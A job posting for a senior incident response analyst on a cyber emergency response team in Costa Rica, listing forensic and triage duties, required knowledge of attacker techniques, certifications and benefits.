Senior Analyst, Cyber Risk Defense, Cyber Emergency Response Team

Advance English B2+/C1, Cyber Emergency Response Team, Cyber Risk Defense, Cybersecurity, Hiring, Hybrid, IT, Technology
Costa Rica
January 29, 2025
Full Time
Urgent

Apply for this job

Email *
Full Name *
CV Attachment *
Browse

Upload file .pdf, .doc, .docx

Job Description

The Kaiser Cyber Emergency Response Team (KCERT) uses incident response, investigative, and forensics skills (endpoint, network, SIEM, etc.) to scope, triage, and determine the extent of a potential security breach, the containment measures required, and the overall response needed. This includes appropriate data collection, preservation, mitigation, remediation requirements, reporting, and security improvement plans.  The Incident Handler uses incident response playbooks and also makes tactical decisions based on industry standards and best practices throughought the response lifecycle for internal and/or external threats. As required, for speed or for evidence handling requirements, the responder may need to maintain and provide chain of custody service for criminal investigations (e.g., employee situations, fraud, etc.).

Essential Responsibilities            

• Evaluate alerts, evidence, and indicators from all relevant source (network, endpoint, SIEM, local logs, etc. ) to successfully triage, scope, and evaluate threats.                                                              

• Perform cyber defense incident triage, to include determining scope, urgency, and potential impact, identifying the specific vulnerability, and implement rapid containment controls.                               

• Collects and preserves digital evidence in an appropriate manner for the threat (up to and including a forensically sound manner according to best practices)                                                                   

• Evaluates artifacts (processes, services, drivers, libraries, binaries, scripts, memory, network traffic, file, email, and other objects) for malicious activity, exploitation, and/or unauthorized access  

• Identifies attack vectors, exploit methods, malicious code, C2 activity, and persistence mechanism

• Performs analysis to determine full scope, risk, and impact of breach or exposure                          

• Performs root cause analysis and recommend mitigation strategies                                                     

• Properly and thoroughly document incident findings, evidence, analysis steps, and create status updates, findings reports, and recommendations                                                               

• Focus on preserving uptime and minimize the impact on business and medical services               

• Collaborate with other teams to perform real-time cyber defense incident handling (e.g., forensic collections, intrusion correlation and tracking, threat analysis, and direct system remediation) tasks.        

• Employ approved defense-in-depth principles and practices (e.g., defense-in-multiple places, layered defenses, security robustness).                                                               

• Collect and analyze intrusion artifacts (e.g., source code, malware, Trojans) and use discovered data to enable mitigation of potential cyber defense incidents within the enterprise.                                       

• Coordinate with intelligence analysts to correlate threat assessment data.                                       

• Write, publish, and socialize after action reports and presentations.                                                    

•  Determine the extent of threats and recommend mitigation and/or remediation courses of action or countermeasures to manage risks.”                                                                  

Minimum Qualifications              

• Bachelors Degree or higher in cybersecurity-, IT-, or business-related fields KCERT Senior Analyst: 5 years of experience

• Knowledge of computer networking concepts and protocols, and network security methodologies.

• Knowledge of cyber threats and vulnerabilities.                                                                         

• Knowledge of specific operational impacts of cybersecurity lapses.                                                     

• Knowledge of incident response and handling methodologies.                                                              

• Knowledge of intrusion detection methodologies and techniques for detecting host and network-based intrusions.                                                                       

• Knowledge of what constitutes a network attack and a network attack’s relationship to both threats and vulnerabilities.                                                                      

• Knowledge of cyber attack stages (e.g., reconnaissance, scanning, enumeration, gaining access, escalation of privileges, maintaining access, network exploitation, covering tracks).                                            

• Knowledge of adversarial tactics, techniques, and procedures.                                                                                                                                         

Additional Requirements

•Broad knowledge of digital processing platforms, hardware, operating systems, and applications and the ability to identify and troubleshoot and triage failures in any of these areas.

• A strong understanding of malware and attacker techniques

• Ability to perform deep-dive analysis to determine root cause and full impact of incidents

• Knowledge and experience in security controls including EDR, forensics tools, intrusion prevention, authentication mechanisms, data collection and analysis tools, and Splunk SIEM

• Excellent communication and documentation skills

• Avoid unnecessary production impact caused by investigation activities, if avoidable

• Properly manage elevated access within the environment

• Ability to work in a team of professionals sharing workload and investigation assignments in a fast-paced and high risk environment

• Ability to produce reports for senior level management that properly articulate risk, exposure, and corrective action plans

• Ability to lead diverse teams of SMEs and Operations Management through a security incident

• Ability to respond quickly and accurately to any level of security incident

• Expert knowledge of Windows-based operating systems

• Working knowledge of Linux/UNIX-based operating systems

• Proficient with shell scripting skills in multiple modern languages

• Experience with multiple forensics platforms, such as EnCase, FTK, X-Ways, etc.

• Possesses a strong understanding of networking and the ability to decode and analyze traffic

• Possesses an expert knowledge of security controls and technologies at all layers

• Strong self-starting ability, patience, and leadership skills

•  Effective communication skills and the ability to understand and translate cyber security threats from a technical perspective to business-level understanding and execution.

• Strong analytical and problem-solving skills and the ability to work with a diverse array of teams   

• Broad technical background involving cyber security, computer forensics, network forensics, log forensics, incident response, and/or incident management

• A thorough understanding of attacker/malware tools, tactics, and procedures

• Training, mentoring, leadership, and project management skills

Licenses and Certifications                        

EnCE, GCFE, GCFA, GNFA, GDAT, GCIH, GREM, GLEG, GDSA, GCCC, CISA, CISM, and/or similar certifications                                                   

Benefits

  •  Transportation.
  •  Life insurance.
  •  Medical insurance.
  •  Solidarity association.
  •  Growth plans.
  • Additional days off.  

K4

Related Jobs